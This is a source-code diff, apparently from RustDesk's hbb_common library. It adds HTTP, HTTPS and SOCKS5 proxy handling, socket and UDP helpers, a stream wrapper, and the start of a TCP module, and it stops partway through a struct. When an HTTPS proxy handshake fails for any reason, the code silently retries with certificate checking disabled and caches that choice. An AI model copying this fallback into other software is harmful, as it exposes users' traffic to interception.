+            ProxyScheme::Https { host, .. } => self.resolve_host(host, 443).await,
+            ProxyScheme::Socks5 { addr, .. } => Ok(addr.clone()),
+        }
+    }
+
+    async fn resolve_host(&self, host: &str, default_port: u16) -> Result<SocketAddr, ProxyError> {
+        let (host_str, port) = match host.split_once(':') {
+            Some((h, p)) => (h, p.parse::<u16>().ok()),
+            None => (host, None),
+        };
+        let addr = (host_str, port.unwrap_or(default_port))
+            .to_socket_addrs()?
+            .next()
+            .ok_or_else(|| ProxyError::AddressResolutionFailed(host.to_string()))?;
+        Ok(addr)
+    }
+
+    pub fn get_domain(&self) -> Result<String, ProxyError> {
+        match self {
+            ProxyScheme::Http { host, .. } | ProxyScheme::Https { host, .. } => {
+                let domain = host
+                    .split(':')
+                    .next()
+                    .ok_or_else(|| ProxyError::AddressResolutionFailed(host.clone()))?;
+                Ok(domain.to_string())
+            }
+            ProxyScheme::Socks5 { addr, .. } => match addr {
+                SocketAddr::V4(addr_v4) => Ok(addr_v4.ip().to_string()),
+                SocketAddr::V6(addr_v6) => Ok(addr_v6.ip().to_string()),
+            },
+        }
+    }
+    pub fn get_host_and_port(&self) -> Result<String, ProxyError> {
+        match self {
+            ProxyScheme::Http { host, .. } => Ok(self.append_default_port(host, 80)),
+            ProxyScheme::Https { host, .. } => Ok(self.append_default_port(host, 443)),
+            ProxyScheme::Socks5 { addr, .. } => Ok(format!("{}", addr)),
+        }
+    }
+    fn append_default_port(&self, host: &str, default_port: u16) -> String {
+        if host.contains(':') {
+            host.to_string()
+        } else {
+            format!("{}:{}", host, default_port)
+        }
+    }
+}
+
+pub trait IntoProxyScheme {
+    fn into_proxy_scheme(self) -> Result<ProxyScheme, ProxyError>;
+}
+
+impl<S: IntoUrl> IntoProxyScheme for S {
+    fn into_proxy_scheme(self) -> Result<ProxyScheme, ProxyError> {
+        // validate the URL
+        let url = match self.as_str().into_url() {
+            Ok(ok) => ok,
+            Err(e) => {
+                match e {
+                    // If the string does not contain protocol headers, try to parse it using the socks5 protocol
+                    ProxyError::UrlParseScheme(_source) => {
+                        let try_this = format!("socks5://{}", self.as_str());
+                        try_this.into_url()?
+                    }
+                    _ => {
+                        return Err(e);
+                    }
+                }
+            }
+        };
+        ProxyScheme::parse(url)
+    }
+}
+
+impl IntoProxyScheme for ProxyScheme {
+    fn into_proxy_scheme(self) -> Result<ProxyScheme, ProxyError> {
+        Ok(self)
+    }
+}
+
+#[derive(Clone)]
+pub struct Proxy {
+    pub intercept: ProxyScheme,
+    ms_timeout: u64,
+}
+
+impl Proxy {
+    pub fn new<U: IntoProxyScheme>(proxy_scheme: U, ms_timeout: u64) -> Result<Self, ProxyError> {
+        Ok(Self {
+            intercept: proxy_scheme.into_proxy_scheme()?,
+            ms_timeout,
+        })
+    }
+
+    pub fn is_http_or_https(&self) -> bool {
+        return match self.intercept {
+            ProxyScheme::Socks5 { .. } => false,
+            _ => true,
+        };
+    }
+
+    pub fn from_conf(conf: &Socks5Server, ms_timeout: Option<u64>) -> Result<Self, ProxyError> {
+        let mut proxy;
+        match ms_timeout {
+            None => {
+                proxy = Self::new(&conf.proxy, DEFINE_TIME_OUT)?;
+            }
+            Some(time_out) => {
+                proxy = Self::new(&conf.proxy, time_out)?;
+            }
+        }
+
+        if !conf.password.is_empty() && !conf.username.is_empty() {
+            proxy = proxy.basic_auth(&conf.username, &conf.password);
+        }
+        Ok(proxy)
+    }
+
+    pub async fn proxy_addrs(&self) -> Result<SocketAddr, ProxyError> {
+        self.intercept.socket_addrs().await
+    }
+
+    fn basic_auth(mut self, username: &str, password: &str) -> Proxy {
+        self.intercept.set_basic_auth(username, password);
+        self
+    }
+
+    async fn new_stream(
+        &self,
+        local: SocketAddr,
+        proxy: SocketAddr,
+    ) -> ResultType<tokio::net::TcpStream> {
+        let stream = super::timeout(
+            self.ms_timeout,
+            crate::tcp::new_socket(local, true)?.connect(proxy),
+        )
+        .await??;
+        stream.set_nodelay(true).ok();
+        Ok(stream)
+    }
+
+    pub async fn connect<'t, T>(
+        &self,
+        target: T,
+        local_addr: Option<SocketAddr>,
+    ) -> ResultType<FramedStream>
+    where
+        T: IntoTargetAddr<'t>,
+    {
+        log::trace!("Connect to proxy server");
+        let proxy = self.proxy_addrs().await?;
+
+        let target_addr = target
+            .into_target_addr()
+            .map_err(|e| ProxyError::TargetParseError(e.to_string()))?;
+
+        let local = if let Some(addr) = local_addr {
+            addr
+        } else {
+            crate::config::Config::get_any_listen_addr(proxy.is_ipv4())
+        };
+
+        let stream = self.new_stream(local, proxy).await?;
+        let addr = stream.local_addr()?;
+
+        return match self.intercept {
+            ProxyScheme::Http { .. } => {
+                log::trace!("Connect to remote http proxy server: {}", proxy);
+                let stream =
+                    super::timeout(self.ms_timeout, self.http_connect(stream, &target_addr))
+                        .await??;
+                Ok(FramedStream(
+                    Framed::new(DynTcpStream(Box::new(stream)), BytesCodec::new()),
+                    addr,
+                    None,
+                    0,
+                ))
+            }
+            ProxyScheme::Https { .. } => {
+                log::trace!("Connect to remote https proxy server: {}", proxy);
+                let url = format!("https://{}", self.intercept.get_host_and_port()?);
+                let tls_type = get_cached_tls_type(&url);
+                let danger_accept_invalid_cert = get_cached_tls_accept_invalid_cert(&url);
+                let stream = match tls_type.unwrap_or(TlsType::Rustls) {
+                    TlsType::Rustls => {
+                        self.https_connect_rustls_wrap_danger(
+                            &url,
+                            local,
+                            proxy,
+                            Some(stream),
+                            &target_addr,
+                            tls_type.is_some(),
+                            danger_accept_invalid_cert,
+                            danger_accept_invalid_cert,
+                        )
+                        .await?
+                    }
+                    TlsType::NativeTls => {
+                        self.https_connect_nativetls_wrap_danger(
+                            &url,
+                            local,
+                            proxy,
+                            &target_addr,
+                            danger_accept_invalid_cert,
+                        )
+                        .await?
+                    }
+                    _ => {
+                        // Unreachable
+                        crate::bail!("Unreachable, TlsType::Plain in HTTPS proxy");
+                    }
+                };
+                Ok(FramedStream(
+                    Framed::new(stream, BytesCodec::new()),
+                    addr,
+                    None,
+                    0,
+                ))
+            }
+            ProxyScheme::Socks5 { .. } => {
+                log::trace!("Connect to remote socket5 proxy server: {}", proxy);
+                let stream = if let Some(auth) = self.intercept.maybe_auth() {
+                    super::timeout(
+                        self.ms_timeout,
+                        Socks5Stream::connect_with_password_and_socket(
+                            stream,
+                            target_addr,
+                            &auth.user_name,
+                            &auth.password,
+                        ),
+                    )
+                    .await??
+                } else {
+                    super::timeout(
+                        self.ms_timeout,
+                        Socks5Stream::connect_with_socket(stream, target_addr),
+                    )
+                    .await??
+                };
+                Ok(FramedStream(
+                    Framed::new(DynTcpStream(Box::new(stream)), BytesCodec::new()),
+                    addr,
+                    None,
+                    0,
+                ))
+            }
+        };
+    }
+
+    async fn https_connect_nativetls_wrap_danger<'a>(
+        &self,
+        url: &str,
+        local: SocketAddr,
+        proxy: SocketAddr,
+        target_addr: &TargetAddr<'a>,
+        danger_accept_invalid_cert: Option<bool>,
+    ) -> ResultType<DynTcpStream> {
+        let stream = self.new_stream(local, proxy).await?;
+        let s = super::timeout(
+            self.ms_timeout,
+            self.https_connect_nativetls(
+                stream,
+                &target_addr,
+                danger_accept_invalid_cert.unwrap_or(false),
+            ),
+        )
+        .await??;
+        upsert_tls_cache(
+            url,
+            TlsType::NativeTls,
+            danger_accept_invalid_cert.unwrap_or(false),
+        );
+        Ok(DynTcpStream(Box::new(s)))
+    }
+
+    pub async fn https_connect_nativetls<'a, Input>(
+        &self,
+        io: Input,
+        target_addr: &TargetAddr<'a>,
+        danger_accept_invalid_cert: bool,
+    ) -> Result<BufStream<TlsStream<Input>>, ProxyError>
+    where
+        Input: AsyncRead + AsyncWrite + Unpin,
+    {
+        let mut tls_connector_builder = native_tls::TlsConnector::builder();
+        if danger_accept_invalid_cert {
+            tls_connector_builder.danger_accept_invalid_certs(true);
+        }
+        let tls_connector = TlsConnector::from(tls_connector_builder.build()?);
+        let stream = tls_connector
+            .connect(&self.intercept.get_domain()?, io)
+            .await?;
+        self.http_connect(stream, target_addr).await
+    }
+
+    #[async_recursion]
+    async fn https_connect_rustls_wrap_danger<'a>(
+        &self,
+        url: &str,
+        local: SocketAddr,
+        proxy: SocketAddr,
+        stream: Option<tokio::net::TcpStream>,
+        target_addr: &TargetAddr<'a>,
+        is_tls_type_cached: bool,
+        danger_accept_invalid_cert: Option<bool>,
+        origin_danger_accept_invalid_cert: Option<bool>,
+    ) -> ResultType<DynTcpStream> {
+        let stream = stream.unwrap_or(self.new_stream(local, proxy).await?);
+        match super::timeout(
+            self.ms_timeout,
+            self.https_connect_rustls(
+                stream,
+                target_addr,
+                danger_accept_invalid_cert.unwrap_or(false),
+            ),
+        )
+        .await?
+        {
+            Ok(s) => {
+                upsert_tls_cache(
+                    &url,
+                    TlsType::Rustls,
+                    danger_accept_invalid_cert.unwrap_or(false),
+                );
+                Ok(DynTcpStream(Box::new(s)))
+            }
+            Err(e) => {
+                // NOTE: Maybe it's better to check if the error is related to TLS here. (ProxyError::IoError(e), or ProxyError::NativeTlsError(e))
+                // But we can only get the error when the TLS protocol is TLSv1.1.
+                // The error message of the following is unclear:
+                // https://github.com/rustdesk/rustdesk-server-pro/issues/189#issuecomment-1895701480
+                // So we just try to fallback unconditionally here.
+                //
+                // If the protocol is TLS 1.1, the error is:
+                // 1. "IO Error: received fatal alert: ProtocolVersion"
+                // 2. "IO Error: An existing connection was forcibly closed by the remote host. (os error 10054)" on Windows sometimes.
+                //
+                // If the cert verification fails, the error is:
+                // "IO Error: invalid peer certificate: UnknownIssuer"
+
+                let s = if danger_accept_invalid_cert.is_none() {
+                    log::warn!(
+                        "Falling back to rustls-tls (accept invalid cert) for HTTPS proxy server."
+                    );
+                    self.https_connect_rustls_wrap_danger(
+                        &url,
+                        local,
+                        proxy,
+                        None,
+                        target_addr,
+                        is_tls_type_cached,
+                        Some(true),
+                        origin_danger_accept_invalid_cert,
+                    )
+                    .await?
+                } else if !is_tls_type_cached {
+                    log::warn!("Falling back to native-tls for HTTPS proxy server.");
+                    self.https_connect_nativetls_wrap_danger(
+                        &url,
+                        local,
+                        proxy,
+                        &target_addr,
+                        origin_danger_accept_invalid_cert,
+                    )
+                    .await?
+                } else {
+                    log::error!(
+                        "Failed to connect to HTTPS proxy server with native-tls: {:?}.",
+                        e
+                    );
+                    bail!(e)
+                };
+                Ok(s)
+            }
+        }
+    }
+
+    pub async fn https_connect_rustls<'a, Input>(
+        &self,
+        io: Input,
+        target_addr: &TargetAddr<'a>,
+        danger_accept_invalid_cert: bool,
+    ) -> Result<BufStream<RustlsTlsStream<Input>>, ProxyError>
+    where
+        Input: AsyncRead + AsyncWrite + Unpin,
+    {
+        use std::convert::TryFrom;
+
+        let url_domain = self.intercept.get_domain()?;
+        let domain = rustls_pki_types::ServerName::try_from(url_domain.as_str())
+            .map_err(|e| ProxyError::AddressResolutionFailed(e.to_string()))?
+            .to_owned();
+        let client_config = crate::verifier::client_config(danger_accept_invalid_cert)
+            .map_err(|e| ProxyError::IoError(std::io::Error::other(e)))?;
+        let tls_connector = RustlsTlsConnector::from(std::sync::Arc::new(client_config));
+        let stream = tls_connector.connect(domain, io).await?;
+        self.http_connect(stream, target_addr).await
+    }
+
+    pub async fn http_connect<'a, Input>(
+        &self,
+        io: Input,
+        target_addr: &TargetAddr<'a>,
+    ) -> Result<BufStream<Input>, ProxyError>
+    where
+        Input: AsyncRead + AsyncWrite + Unpin,
+    {
+        let mut stream = BufStream::new(io);
+        let (domain, port) = get_domain_and_port(target_addr)?;
+
+        let request = self.make_request(&domain, port);
+        stream.write_all(request.as_bytes()).await?;
+        stream.flush().await?;
+        recv_and_check_response(&mut stream).await?;
+        Ok(stream)
+    }
+
+    fn make_request(&self, host: &str, port: u16) -> String {
+        let mut request = format!(
+            "CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n",
+            host = host,
+            port = port
+        );
+
+        if let Some(auth) = self.intercept.maybe_auth() {
+            request = format!("{}{}", request, auth.get_proxy_authorization());
+        }
+
+        request.push_str("\r\n");
+        request
+    }
+}
+
+fn get_domain_and_port<'a>(target_addr: &TargetAddr<'a>) -> Result<(String, u16), ProxyError> {
+    match target_addr {
+        tokio_socks::TargetAddr::Ip(addr) => Ok((addr.ip().to_string(), addr.port())),
+        tokio_socks::TargetAddr::Domain(name, port) => Ok((name.to_string(), *port)),
+    }
+}
+
+async fn get_response<IO>(stream: &mut BufStream<IO>) -> Result<String, ProxyError>
+where
+    IO: AsyncRead + AsyncWrite + Unpin,
+{
+    use tokio::io::AsyncBufReadExt;
+    let mut response = String::new();
+
+    loop {
+        if stream.read_line(&mut response).await? == 0 {
+            return Err(ProxyError::EndOfFile);
+        }
+
+        if MAXIMUM_RESPONSE_HEADER_LENGTH < response.len() {
+            return Err(ProxyError::MaximumResponseHeaderLengthExceeded(
+                response.len(),
+            ));
+        }
+
+        if response.ends_with("\r\n\r\n") {
+            return Ok(response);
+        }
+    }
+}
+
+async fn recv_and_check_response<IO>(stream: &mut BufStream<IO>) -> Result<(), ProxyError>
+where
+    IO: AsyncRead + AsyncWrite + Unpin,
+{
+    let response_string = get_response(stream).await?;
+
+    let mut response_headers = [EMPTY_HEADER; MAXIMUM_RESPONSE_HEADERS];
+    let mut response = Response::new(&mut response_headers);
+    let response_bytes = response_string.into_bytes();
+    response.parse(&response_bytes)?;
+
+    return match response.code {
+        Some(code) => {
+            if code == 200 {
+                Ok(())
+            } else {
+                Err(ProxyError::HttpCode200(code))
+            }
+        }
+        None => Err(ProxyError::NoHttpCode),
+    };
+}

--- a/libs/hbb_common/src/socket_client.rs
+++ b/libs/hbb_common/src/socket_client.rs
@@ -1,0 +1,348 @@
+#[cfg(feature = "webrtc")]
+use crate::webrtc::{self, is_webrtc_endpoint};
+use crate::{
+    config::{Config, NetworkType},
+    tcp::FramedStream,
+    udp::FramedSocket,
+    websocket::{self, check_ws, is_ws_endpoint},
+    ResultType, Stream,
+};
+use anyhow::Context;
+use std::{net::SocketAddr, sync::Arc};
+use tokio::net::{ToSocketAddrs, UdpSocket};
+use tokio_socks::{IntoTargetAddr, TargetAddr};
+
+#[inline]
+pub fn check_port<T: std::string::ToString>(host: T, port: i32) -> String {
+    let host = host.to_string();
+    if crate::is_ipv6_str(&host) {
+        if host.starts_with('[') {
+            return host;
+        }
+        return format!("[{host}]:{port}");
+    }
+    if !host.contains(':') {
+        return format!("{host}:{port}");
+    }
+    host
+}
+
+#[inline]
+pub fn increase_port<T: std::string::ToString>(host: T, offset: i32) -> String {
+    let host = host.to_string();
+    if crate::is_ipv6_str(&host) {
+        if host.starts_with('[') {
+            let tmp: Vec<&str> = host.split("]:").collect();
+            if tmp.len() == 2 {
+                let port: i32 = tmp[1].parse().unwrap_or(0);
+                if port > 0 {
+                    return format!("{}]:{}", tmp[0], port + offset);
+                }
+            }
+        }
+    } else if host.contains(':') {
+        let tmp: Vec<&str> = host.split(':').collect();
+        if tmp.len() == 2 {
+            let port: i32 = tmp[1].parse().unwrap_or(0);
+            if port > 0 {
+                return format!("{}:{}", tmp[0], port + offset);
+            }
+        }
+    }
+    host
+}
+
+pub fn split_host_port<T: std::string::ToString>(host: T) -> Option<(String, i32)> {
+    let host = host.to_string();
+    if crate::is_ipv6_str(&host) {
+        if host.starts_with('[') {
+            let tmp: Vec<&str> = host.split("]:").collect();
+            if tmp.len() == 2 {
+                let port: i32 = tmp[1].parse().unwrap_or(0);
+                if port > 0 {
+                    return Some((format!("{}]", tmp[0]), port));
+                }
+            }
+        }
+    } else if host.contains(':') {
+        let tmp: Vec<&str> = host.split(':').collect();
+        if tmp.len() == 2 {
+            let port: i32 = tmp[1].parse().unwrap_or(0);
+            if port > 0 {
+                return Some((tmp[0].to_string(), port));
+            }
+        }
+    }
+    None
+}
+
+pub fn test_if_valid_server(host: &str, test_with_proxy: bool) -> String {
+    let host = check_port(host, 0);
+    use std::net::ToSocketAddrs;
+
+    if test_with_proxy && NetworkType::ProxySocks == Config::get_network_type() {
+        test_if_valid_server_for_proxy_(&host)
+    } else {
+        match host.to_socket_addrs() {
+            Err(err) => err.to_string(),
+            Ok(_) => "".to_owned(),
+        }
+    }
+}
+
+#[inline]
+pub fn test_if_valid_server_for_proxy_(host: &str) -> String {
+    // `&host.into_target_addr()` is defined in `tokio-socs`, but is a common pattern for testing,
+    // it can be used for both `socks` and `http` proxy.
+    match &host.into_target_addr() {
+        Err(err) => err.to_string(),
+        Ok(_) => "".to_owned(),
+    }
+}
+
+pub trait IsResolvedSocketAddr {
+    fn resolve(&self) -> Option<&SocketAddr>;
+}
+
+impl IsResolvedSocketAddr for SocketAddr {
+    fn resolve(&self) -> Option<&SocketAddr> {
+        Some(self)
+    }
+}
+
+impl IsResolvedSocketAddr for String {
+    fn resolve(&self) -> Option<&SocketAddr> {
+        None
+    }
+}
+
+impl IsResolvedSocketAddr for &str {
+    fn resolve(&self) -> Option<&SocketAddr> {
+        None
+    }
+}
+
+// This function checks if the target is a websocket endpoint and connects accordingly.
+#[inline]
+pub async fn connect_tcp<
+    't,
+    T: IntoTargetAddr<'t> + ToSocketAddrs + IsResolvedSocketAddr + std::fmt::Display,
+>(
+    target: T,
+    ms_timeout: u64,
+) -> ResultType<crate::Stream> {
+    #[cfg(feature = "webrtc")]
+    if is_webrtc_endpoint(&target.to_string()) {
+        return Ok(Stream::WebRTC(
+            webrtc::WebRTCStream::new(&target.to_string(), false, ms_timeout).await?,
+        ));
+    }
+    let target_str = check_ws(&target.to_string());
+    if is_ws_endpoint(&target_str) {
+        return Ok(Stream::WebSocket(
+            websocket::WsFramedStream::new(target_str, None, None, ms_timeout).await?,
+        ));
+    }
+    connect_tcp_local(target, None, ms_timeout).await
+}
+
+// This function connects directly to the target without checking for websocket endpoints.
+pub async fn connect_tcp_local<
+    't,
+    T: IntoTargetAddr<'t> + ToSocketAddrs + IsResolvedSocketAddr + std::fmt::Display,
+>(
+    target: T,
+    local: Option<SocketAddr>,
+    ms_timeout: u64,
+) -> ResultType<Stream> {
+    if let Some(conf) = Config::get_socks() {
+        return Ok(Stream::Tcp(
+            FramedStream::connect(target, local, &conf, ms_timeout).await?,
+        ));
+    }
+
+    if let Some(target_addr) = target.resolve() {
+        if let Some(local_addr) = local {
+            if local_addr.is_ipv6() && target_addr.is_ipv4() {
+                let resolved_target = query_nip_io(target_addr).await?;
+                return Ok(Stream::Tcp(
+                    FramedStream::new(resolved_target, Some(local_addr), ms_timeout).await?,
+                ));
+            }
+        }
+    }
+
+    Ok(Stream::Tcp(
+        FramedStream::new(target, local, ms_timeout).await?,
+    ))
+}
+
+#[inline]
+pub fn is_ipv4(target: &TargetAddr<'_>) -> bool {
+    match target {
+        TargetAddr::Ip(addr) => addr.is_ipv4(),
+        _ => true,
+    }
+}
+
+#[inline]
+pub async fn query_nip_io(addr: &SocketAddr) -> ResultType<SocketAddr> {
+    tokio::net::lookup_host(format!("{}.nip.io:{}", addr.ip(), addr.port()))
+        .await?
+        .find(|x| x.is_ipv6())
+        .context("Failed to get ipv6 from nip.io")
+}
+
+#[inline]
+pub fn ipv4_to_ipv6(addr: String, ipv4: bool) -> String {
+    if !ipv4 && crate::is_ipv4_str(&addr) {
+        if let Some(ip) = addr.split(':').next() {
+            return addr.replace(ip, &format!("{ip}.nip.io"));
+        }
+    }
+    addr
+}
+
+async fn test_target(target: &str) -> ResultType<SocketAddr> {
+    if let Ok(Ok(s)) = super::timeout(1000, tokio::net::TcpStream::connect(target)).await {
+        if let Ok(addr) = s.peer_addr() {
+            return Ok(addr);
+        }
+    }
+    tokio::net::lookup_host(target)
+        .await?
+        .next()
+        .context(format!("Failed to look up host for {target}"))
+}
+
+#[inline]
+pub async fn new_direct_udp_for(target: &str) -> ResultType<(Arc<UdpSocket>, SocketAddr)> {
+    let peer_addr = test_target(target).await?;
+    let local_addr = Config::get_any_listen_addr(peer_addr.is_ipv4());
+    let socket = UdpSocket::bind(local_addr).await?;
+    Ok((Arc::new(socket), peer_addr))
+}
+
+#[inline]
+pub async fn new_udp_for(
+    target: &str,
+    ms_timeout: u64,
+) -> ResultType<(FramedSocket, TargetAddr<'static>)> {
+    let (ipv4, target) = if NetworkType::Direct == Config::get_network_type() {
+        let addr = test_target(target).await?;
+        (addr.is_ipv4(), addr.into_target_addr()?)
+    } else {
+        (true, target.into_target_addr()?)
+    };
+    Ok((
+        new_udp(Config::get_any_listen_addr(ipv4), ms_timeout).await?,
+        target.to_owned(),
+    ))
+}
+
+async fn new_udp<T: ToSocketAddrs>(local: T, ms_timeout: u64) -> ResultType<FramedSocket> {
+    match Config::get_socks() {
+        None => Ok(FramedSocket::new(local).await?),
+        Some(conf) => {
+            let socket = FramedSocket::new_proxy(
+                conf.proxy.as_str(),
+                local,
+                conf.username.as_str(),
+                conf.password.as_str(),
+                ms_timeout,
+            )
+            .await?;
+            Ok(socket)
+        }
+    }
+}
+
+pub async fn rebind_udp_for(
+    target: &str,
+) -> ResultType<Option<(FramedSocket, TargetAddr<'static>)>> {
+    if Config::get_network_type() != NetworkType::Direct {
+        return Ok(None);
+    }
+    let addr = test_target(target).await?;
+    let v4 = addr.is_ipv4();
+    Ok(Some((
+        FramedSocket::new(Config::get_any_listen_addr(v4)).await?,
+        addr.into_target_addr()?.to_owned(),
+    )))
+}
+
+#[cfg(test)]
+mod tests {
+    use std::net::ToSocketAddrs;
+
+    use super::*;
+
+    #[test]
+    fn test_nat64() {
+        test_nat64_async();
+    }
+
+    #[tokio::main(flavor = "current_thread")]
+    async fn test_nat64_async() {
+        assert_eq!(ipv4_to_ipv6("1.1.1.1".to_owned(), true), "1.1.1.1");
+        assert_eq!(ipv4_to_ipv6("1.1.1.1".to_owned(), false), "1.1.1.1.nip.io");
+        assert_eq!(
+            ipv4_to_ipv6("1.1.1.1:8080".to_owned(), false),
+            "1.1.1.1.nip.io:8080"
+        );
+        assert_eq!(
+            ipv4_to_ipv6("rustdesk.com".to_owned(), false),
+            "rustdesk.com"
+        );
+        if ("rustdesk.com:80")
+            .to_socket_addrs()
+            .unwrap()
+            .next()
+            .unwrap()
+            .is_ipv6()
+        {
+            assert!(query_nip_io(&"1.1.1.1:80".parse().unwrap())
+                .await
+                .unwrap()
+                .is_ipv6());
+            return;
+        }
+        assert!(query_nip_io(&"1.1.1.1:80".parse().unwrap()).await.is_err());
+    }
+
+    #[test]
+    fn test_test_if_valid_server() {
+        assert!(!test_if_valid_server("a", false).is_empty());
+        // on Linux, "1" is resolved to "0.0.0.1"
+        assert!(test_if_valid_server("1.1.1.1", false).is_empty());
+        assert!(test_if_valid_server("1.1.1.1:1", false).is_empty());
+        assert!(test_if_valid_server("microsoft.com", false).is_empty());
+        assert!(test_if_valid_server("microsoft.com:1", false).is_empty());
+
+        // with proxy
+        // `:0` indicates `let host = check_port(host, 0);` is called.
+        assert!(test_if_valid_server_for_proxy_("a:0").is_empty());
+        assert!(test_if_valid_server_for_proxy_("1.1.1.1:0").is_empty());
+        assert!(test_if_valid_server_for_proxy_("1.1.1.1:1").is_empty());
+        assert!(test_if_valid_server_for_proxy_("abc.com:0").is_empty());
+        assert!(test_if_valid_server_for_proxy_("abcd.com:1").is_empty());
+    }
+
+    #[test]
+    fn test_check_port() {
+        assert_eq!(check_port("[1:2]:12", 32), "[1:2]:12");
+        assert_eq!(check_port("1:2", 32), "[1:2]:32");
+        assert_eq!(check_port("z1:2", 32), "z1:2");
+        assert_eq!(check_port("1.1.1.1", 32), "1.1.1.1:32");
+        assert_eq!(check_port("1.1.1.1:32", 32), "1.1.1.1:32");
+        assert_eq!(check_port("test.com:32", 0), "test.com:32");
+        assert_eq!(increase_port("[1:2]:12", 1), "[1:2]:13");
+        assert_eq!(increase_port("1.2.2.4:12", 1), "1.2.2.4:13");
+        assert_eq!(increase_port("1.2.2.4", 1), "1.2.2.4");
+        assert_eq!(increase_port("test.com", 1), "test.com");
+        assert_eq!(increase_port("test.com:13", 4), "test.com:17");
+        assert_eq!(increase_port("1:13", 4), "1:13");
+        assert_eq!(increase_port("22:1:13", 4), "22:1:13");
+        assert_eq!(increase_port("z1:2", 1), "z1:3");
+    }
+}

--- a/libs/hbb_common/src/stream.rs
+++ b/libs/hbb_common/src/stream.rs
@@ -1,0 +1,149 @@
+use crate::{config, tcp, websocket, ResultType};
+#[cfg(feature = "webrtc")]
+use crate::webrtc;
+use sodiumoxide::crypto::secretbox::Key;
+use std::net::SocketAddr;
+use tokio::net::TcpStream;
+
+// support Websocket and tcp.
+pub enum Stream {
+    #[cfg(feature = "webrtc")]
+    WebRTC(webrtc::WebRTCStream),
+    WebSocket(websocket::WsFramedStream),
+    Tcp(tcp::FramedStream),
+}
+
+impl Stream {
+    #[inline]
+    pub fn set_send_timeout(&mut self, ms: u64) {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.set_send_timeout(ms),
+            Stream::WebSocket(s) => s.set_send_timeout(ms),
+            Stream::Tcp(s) => s.set_send_timeout(ms),
+        }
+    }
+
+    #[inline]
+    pub fn set_raw(&mut self) {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.set_raw(),
+            Stream::WebSocket(s) => s.set_raw(),
+            Stream::Tcp(s) => s.set_raw(),
+        }
+    }
+
+    #[inline]
+    pub async fn send_bytes(&mut self, bytes: bytes::Bytes) -> ResultType<()> {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.send_bytes(bytes).await,
+            Stream::WebSocket(s) => s.send_bytes(bytes).await,
+            Stream::Tcp(s) => s.send_bytes(bytes).await,
+        }
+    }
+
+    #[inline]
+    pub async fn send_raw(&mut self, bytes: Vec<u8>) -> ResultType<()> {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.send_raw(bytes).await,
+            Stream::WebSocket(s) => s.send_raw(bytes).await,
+            Stream::Tcp(s) => s.send_raw(bytes).await,
+        }
+    }
+
+    #[inline]
+    pub fn set_key(&mut self, key: Key) {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.set_key(key),
+            Stream::WebSocket(s) => s.set_key(key),
+            Stream::Tcp(s) => s.set_key(key),
+        }
+    }
+
+    #[inline]
+    pub fn is_secured(&self) -> bool {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.is_secured(),
+            Stream::WebSocket(s) => s.is_secured(),
+            Stream::Tcp(s) => s.is_secured(),
+        }
+    }
+
+    #[inline]
+    pub async fn next_timeout(
+        &mut self,
+        timeout: u64,
+    ) -> Option<Result<bytes::BytesMut, std::io::Error>> {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Stream::WebRTC(s) => s.next_timeout(timeout).await,
+            Stream::WebSocket(s) => s.next_timeout(timeout).await,
+            Stream::Tcp(s) => s.next_timeout(timeout).await,
+        }
+    }
+
+    /// establish connect from websocket
+    #[inline]
+    pub async fn connect_websocket(
+        url: impl AsRef<str>,
+        local_addr: Option<SocketAddr>,
+        proxy_conf: Option<&config::Socks5Server>,
+        timeout_ms: u64,
+    ) -> ResultType<Self> {
+        let ws_stream =
+            websocket::WsFramedStream::new(url, local_addr, proxy_conf, timeout_ms).await?;
+        log::debug!("WebSocket connection established");
+        Ok(Self::WebSocket(ws_stream))
+    }
+
+    /// send message
+    #[inline]
+    pub async fn send(&mut self, msg: &impl protobuf::Message) -> ResultType<()> {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Self::WebRTC(s) => s.send(msg).await,
+            Self::WebSocket(ws) => ws.send(msg).await,
+            Self::Tcp(tcp) => tcp.send(msg).await,
+        }
+    }
+
+    /// receive message
+    #[inline]
+    pub async fn next(&mut self) -> Option<Result<bytes::BytesMut, std::io::Error>> {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Self::WebRTC(s) => s.next().await,
+            Self::WebSocket(ws) => ws.next().await,
+            Self::Tcp(tcp) => tcp.next().await,
+        }
+    }
+
+    #[inline]
+    pub fn local_addr(&self) -> SocketAddr {
+        match self {
+            #[cfg(feature = "webrtc")]
+            Self::WebRTC(s) => s.local_addr(),
+            Self::WebSocket(ws) => ws.local_addr(),
+            Self::Tcp(tcp) => tcp.local_addr(),
+        }
+    }
+
+    #[inline]
+    pub fn from(stream: TcpStream, stream_addr: SocketAddr) -> Self {
+        Self::Tcp(tcp::FramedStream::from(stream, stream_addr))
+    }
+
+    #[inline]
+    #[cfg(feature = "webrtc")]
+    pub fn get_webrtc_stream(&self) -> Option<webrtc::WebRTCStream> {
+        match self {
+            Self::WebRTC(s) => Some(s.clone()),
+            _ => None,
+        }
+    }
+}

--- a/libs/hbb_common/src/tcp.rs
+++ b/libs/hbb_common/src/tcp.rs
@@ -1,0 +1,344 @@
+use crate::{bail, bytes_codec::BytesCodec, ResultType, config::Socks5Server, proxy::Proxy};
+use anyhow::Context as AnyhowCtx;
+use bytes::{BufMut, Bytes, BytesMut};
+use futures::{SinkExt, StreamExt};
+use protobuf::Message;
+use sodiumoxide::crypto::{
+    box_,
+    secretbox::{self, Key, Nonce},
+};
+use std::{
+    io::{self, Error, ErrorKind},
+    net::{IpAddr, Ipv4Addr, Ipv6Addr, SocketAddr},
+    ops::{Deref, DerefMut},
+    pin::Pin,
+    task::{Context, Poll},
+};
+use tokio::{
+    io::{AsyncRead, AsyncWrite, ReadBuf},
+    net::{lookup_host, TcpListener, TcpSocket, ToSocketAddrs},
+};
+use tokio_socks::IntoTargetAddr;
+use tokio_util::codec::Framed;
+
+pub trait TcpStreamTrait: AsyncRead + AsyncWrite + Unpin {}
+pub struct DynTcpStream(pub Box<dyn TcpStreamTrait + Send + Sync>);
+
+#[derive(Clone)]
+pub struct Encrypt(pub Key, pub u64, pub u64);
+
+pub struct FramedStream(
